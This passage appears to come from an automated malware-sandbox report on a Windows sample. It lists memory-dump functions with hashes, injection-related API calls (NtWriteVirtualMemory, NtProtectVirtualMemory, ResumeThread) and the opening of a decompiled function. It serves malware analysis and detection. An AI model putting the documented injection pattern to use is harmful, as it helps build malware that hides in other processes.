                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 75140aaa6b0aaa3a8e99ab5c95853340ef05739d3eeda00674af5c54bcf9fa78
                    • Instruction ID: 0ca081bcadcb907f92dd78911a4f752f076383b79774a671cad4f7296ae3b344
                    • Opcode Fuzzy Hash: 75140aaa6b0aaa3a8e99ab5c95853340ef05739d3eeda00674af5c54bcf9fa78
                    • Instruction Fuzzy Hash: FED15CD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403A59, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 466memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 81d723dee46c8a333d7a4c1eeee27e9c1f0367bf5a236c6878a5f93cbe02ed79
                    • Instruction ID: c3397bc43d08b1c1228f7726ccd88f792ac617b51ee6aafecb7cebe38466101a
                    • Opcode Fuzzy Hash: 81d723dee46c8a333d7a4c1eeee27e9c1f0367bf5a236c6878a5f93cbe02ed79
                    • Instruction Fuzzy Hash: 94E14CD5A2E703C5E493657140C547158A4EEA735A5738BBB6B33728C2A33E534B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403B49, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 462memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 97c9562cdbac4147a52a8023e3b75503e3b44e7eaa7e0d78d92bac5695e9ce88
                    • Instruction ID: 3f12c97372ce28f349635d59b4d4a7aced63875873a55da9ed396069577c3eb1
                    • Opcode Fuzzy Hash: 97c9562cdbac4147a52a8023e3b75503e3b44e7eaa7e0d78d92bac5695e9ce88
                    • Instruction Fuzzy Hash: 03D15DD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403B13, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 459memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 438b530d07525076249d5500dd81a0f808f93beafd43bd280e7b4bceb66b84a4
                    • Instruction ID: 99dd2135415cf157fae98f5a96e407e5968a581688a5a073e6e10730b26765dc
                    • Opcode Fuzzy Hash: 438b530d07525076249d5500dd81a0f808f93beafd43bd280e7b4bceb66b84a4
                    • Instruction Fuzzy Hash: CCD16DD5A2E703C5E493657140C547154A4EEA735A5738BBB6B33728C2A33E938B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403A87, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 454memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 6bef497d9b5f4b97172db34dc01701245adf4153d42af17ecfef21b952a20b5a
                    • Instruction ID: 0c9976a05d9dd4049be2f25205429234c8763ff8644fe4b66d3c31dd3cf41106
                    • Opcode Fuzzy Hash: 6bef497d9b5f4b97172db34dc01701245adf4153d42af17ecfef21b952a20b5a
                    • Instruction Fuzzy Hash: 92E15CD5A2E703C6E49365B140C543154A4EEA735A5738BBB6B33728C2A33E534B728F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C2E, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 423memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 52bfa5a8b7e36eeec5deebe43f23a49de523933cb62accdb20ce2fdcbec48f5c
                    • Instruction ID: ec6385e80530e1c63d068ebd7a092bb9023b5f6bf5db92ffd4e523cacb32beec
                    • Opcode Fuzzy Hash: 52bfa5a8b7e36eeec5deebe43f23a49de523933cb62accdb20ce2fdcbec48f5c
                    • Instruction Fuzzy Hash: 10D16ED5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E834B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00310F7D, Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 800b3f75948befbf3efb4c197ddbe2c41fa011944ae51ecf0feb7c8441892d21
                    • Instruction ID: 03891df15875d52321c3ef5f4e203c16cbbc9fbf4c29434d059518c6de572163
                    • Opcode Fuzzy Hash: 800b3f75948befbf3efb4c197ddbe2c41fa011944ae51ecf0feb7c8441892d21
                    • Instruction Fuzzy Hash: B3B136B0340305AFEF2A5E20CD96BEA3766EF49780F558128FE845B1C0C3B998D99B45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031232A, Relevance: 1.8, APIs: 1, Instructions: 302nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoadMemoryVirtualWrite
                    • String ID:
                    • API String ID: 3569954152-0
                    • Opcode ID: c7b9860b2ca21dd3f5506567b68fa810542c40d54807522489c0a70eb37e1756
                    • Instruction ID: 558a0ec225665c2a222b99d2037c2baccd6835ff7802a9a1e3c4666512bba25f
                    • Opcode Fuzzy Hash: c7b9860b2ca21dd3f5506567b68fa810542c40d54807522489c0a70eb37e1756
                    • Instruction Fuzzy Hash: 2FA102B0340305AFEB2A5E20CC86BEA3762EF59780F658128FD845B1C0C7B998D69B45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00315435, Relevance: 1.8, APIs: 1, Instructions: 292COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b13b7fe4f2800007817ae4283d17bc8aaad6a6fc37901866109567dcad5b89d
                    • Instruction ID: edb1d1befd8c06dac63a8205fccf7e7310d6f990cb4924a90d46ecd4e8fc446e
                    • Opcode Fuzzy Hash: 5b13b7fe4f2800007817ae4283d17bc8aaad6a6fc37901866109567dcad5b89d
                    • Instruction Fuzzy Hash: 6D9156B0340306FFFB2A5E20CC96BEA3666EF59344F658128FD859B1C0C7B998D69704
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003123D5, Relevance: 1.7, APIs: 1, Instructions: 240nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoadMemoryVirtualWrite
                    • String ID:
                    • API String ID: 3569954152-0
                    • Opcode ID: d54f339f9087c76ba3b9803710847bd03c3ff50a480e7db7564bf4283a83c6ad
                    • Instruction ID: dfce49c1d8069314012c762acc9385ba9544f3aa9544709316e9ef17cb5b1817
                    • Opcode Fuzzy Hash: d54f339f9087c76ba3b9803710847bd03c3ff50a480e7db7564bf4283a83c6ad
                    • Instruction Fuzzy Hash: 558134B034030AAFFB2A5E20CD95BEA7662EF59340F958128FD859B2C0D7B998D58744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00312455, Relevance: 1.7, APIs: 1, Instructions: 211nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: a0effeb6b12b8d73c1df3db14bb383a32a7b85c17417f95c248ffe9f558a6559
                    • Instruction ID: 9b4f2a59ff11d4c54a57e9976af7a09aa21ff37742cde1d6794c03c6a7e51735
                    • Opcode Fuzzy Hash: a0effeb6b12b8d73c1df3db14bb383a32a7b85c17417f95c248ffe9f558a6559
                    • Instruction Fuzzy Hash: 1D7134B0340309AFFB2A5F10CD95BEA7762EF59344F958128FD849B2C0C7B998E99740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003124BD, Relevance: 1.7, APIs: 1, Instructions: 190nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: e92ad1ce50f4631569b3add81fed85fc6b0b0604852b53f66895233a0847dedb
                    • Instruction ID: 73677dfb5660459e75107510eb7eaf8cc12f966a6436a3f7ff378b8514580280
                    • Opcode Fuzzy Hash: e92ad1ce50f4631569b3add81fed85fc6b0b0604852b53f66895233a0847dedb
                    • Instruction Fuzzy Hash: 4A61F1B0340309BFFB2A5F10CD96BEA7662FF19344F558128FD859A2C0C7B998E99744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00312531, Relevance: 1.7, APIs: 1, Instructions: 169nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: c5cd357952217f11fccc880cdc6c7caf361d92fe4eedac8663cb1e394a2df912
                    • Instruction ID: c812a4a6c593a1b1f9065a4fb9b4ef93222687e81b4b30ed9647c0294f4cf75b
                    • Opcode Fuzzy Hash: c5cd357952217f11fccc880cdc6c7caf361d92fe4eedac8663cb1e394a2df912
                    • Instruction Fuzzy Hash: 3351E170340349BFFF2A5E10CDD6BEA3666EF59380F558128FE859A1D0C7B99CE99600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00315F9F, Relevance: 1.7, APIs: 1, Instructions: 162nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction ID: 1fbd5ffe86f0410f7bc1e157f4dcb7d83f222430170aec939ac55b2e6982ffee
                    • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction Fuzzy Hash: 8441BC35208306CFEB2F5DB4C9967E56757AF6E320FA69939C89387865E330C8C69501
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00316039, Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction ID: 78662f752aacba5eff191012b29d3d742325e71e52df639a31ea80f131c825ad
                    • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                    • Instruction Fuzzy Hash: 6C41AF35208305CFEB2F0EB4C8567E56757AF6E320FA65939C85387861D330C8C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00315FC1, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction ID: 89c3b1b6b22975cc9623bed40bebd712e977eb43f2b6b634aa6e92ffd909e190
                    • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                    • Instruction Fuzzy Hash: 03418B35208206CFEB2F1EB4C8567F56757AF6E320FAA5939C86387861E334C8C69601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00315FE5, Relevance: 1.6, APIs: 1, Instructions: 133nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction ID: 4e23da243fc74bcbefef224270665d2613dba5f211b35b65707b2de568bc58e9
                    • Opcode Fuzzy Hash: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                    • Instruction Fuzzy Hash: 24416C35208306CFEB2F1DB4C9667E56756AF6E320FA65929C863C7961E334C8C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00316015, Relevance: 1.6, APIs: 1, Instructions: 126nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction ID: ebf708efc1f26df141cd2ea12de2ea1200f08ff6aa33adcfa847e447778b74df
                    • Opcode Fuzzy Hash: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                    • Instruction Fuzzy Hash: 1F317B35608306CFEB2F1EB0C8667E52756AF6E320FAA5929C86387971D334C8C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031260D, Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: 249470a49a8d98ff69c7caabcab2f5e5722da3fa4f9f724e30d5171d5fc8b0dc
                    • Instruction ID: 37bceadfd8723a8d9a9cebbd9f314fc1b604fbaa85e33eec80602ad9ec4bbdcf
                    • Opcode Fuzzy Hash: 249470a49a8d98ff69c7caabcab2f5e5722da3fa4f9f724e30d5171d5fc8b0dc
                    • Instruction Fuzzy Hash: A941E070740309AFFF2A5E10CDD5BEA7666FF18384F998128FE859A1D0C7B848E99700
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00316089, Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction ID: a63bad9ddb3733a83ec6ffd0819cf5d3de38da94cb63b5ebf7867689506d1ffa
                    • Opcode Fuzzy Hash: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                    • Instruction Fuzzy Hash: A4316735204206CFEB2F1EB0C8663E56756AF2E320FEA5969C862C7971D334C8C5CA01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003160D1, Relevance: 1.6, APIs: 1, Instructions: 109nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction ID: f04720b3d3de261725e124ca47b6e7f76e2bdd41840482086c0bf7c87947c27f
                    • Opcode Fuzzy Hash: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                    • Instruction Fuzzy Hash: EA316D35604205CFEF2F1EB4C8563E57756AF2E320FDA5965C86287971D334C8C5C601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00316106, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction ID: 57256b00afa4fc95f567645480005ce71eeee5fa1060acfc5e9c6d3c8b394f66
                    • Opcode Fuzzy Hash: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                    • Instruction Fuzzy Hash: 24314935604206CFEB2F1EB4C8567E57B56AF2E320FEA5969C862C7971D334C8C5C641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003161ED, Relevance: 1.6, APIs: 1, Instructions: 79nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction ID: 5603df335fab961a0f51c92f6c15b531120b68bad797e059c425261a9a117633
                    • Opcode Fuzzy Hash: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                    • Instruction Fuzzy Hash: F6213B35604205CFEB2E1E74C8697D57B92AF3A320FDA5959C8A2CB4B0D334C8D5CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00312705, Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: f8d65670152e9525930e894010c9818f94664eaa2e997f2c3486d60d0d648629
                    • Instruction ID: d10e7f8e098298c51e846d5d3e65695bc982d81a1831b06bf349f906da3a2bdb
                    • Opcode Fuzzy Hash: f8d65670152e9525930e894010c9818f94664eaa2e997f2c3486d60d0d648629
                    • Instruction Fuzzy Hash: 4021C070B40209EFEB1A6E20CE95BDA77B3FF59380FD98224FD8556190CB3948E58750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00316239, Relevance: 1.6, APIs: 1, Instructions: 65nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction ID: 3291bc81a186868499a6efc871ae9ea91faa634ff1fef56b64b19d44d7a480d7
                    • Opcode Fuzzy Hash: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                    • Instruction Fuzzy Hash: ED112B39604205CFEB2F5EB4C8593D17B62AF3A324FDE5955C8A18B471D330C8D4C651
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031276A, Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 00312783
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryVirtualWrite
                    • String ID:
                    • API String ID: 3527976591-0
                    • Opcode ID: c5afe4dfa15c1be37158547814ac5a51bfc282234dd294ef3d741ce5f93046d2
                    • Instruction ID: d993c73eab41f189641ecc280c9b84c1893dd052429726c03ac611c59d7b2501
                    • Opcode Fuzzy Hash: c5afe4dfa15c1be37158547814ac5a51bfc282234dd294ef3d741ce5f93046d2
                    • Instruction Fuzzy Hash: 9A116D7074064AEFEF1A6F20CD90BD9BA73BF19384F995224FD88550A0CB7648E59740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003162C5, Relevance: 1.5, APIs: 1, Instructions: 37nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction ID: 558773b984cccfdc7f6e9bdeff8513dbaa5876be02b3cf45e8cb8d5a7f5507d0
                    • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                    • Instruction Fuzzy Hash: 9FF05C26B403574E672F2AB8C5753E22B279C7B3207CD4905CC91CB834F721C8D5C204
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00315A6C, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00315609,00000040,00310570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00315A87
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: MemoryProtectVirtual
                    • String ID:
                    • API String ID: 2706961497-0
                    • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                    • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00316325, Relevance: 1.5, APIs: 1, Instructions: 14nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction ID: c6d9f4959cac733e47960aa313651a37c122a51d6684f07c46260ee774a6cf8e
                    • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                    • Instruction Fuzzy Hash: 8BD012245503054D7F1D6DB1C6E438A3A265CE5104799891CD892D2518EA31C4898514
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BE20, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 156COMMON
                    Download Yara Rule
                    C-Code - Quality: 62%
                    			E0040BE20(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				char _v48;
				char _v52;
				char _v60;
				signed int _v64;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t89;
				signed int _t95;
				signed int _t112;
				signed int _t115;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t130 = _t129 - 0xc;
				 *[fs:0x0] = _t130;
				L00401120();
				_v16 = _t130;
				_v12 = 0x4010d0;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401126, _t127);
				_t89 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0);
				asm("fclex");
				_v64 = _t89;
				if(_v64 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14c);
					_push(0x4020d4);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v76 = _t89;
				}
				L004011DA();
				L004011DA();
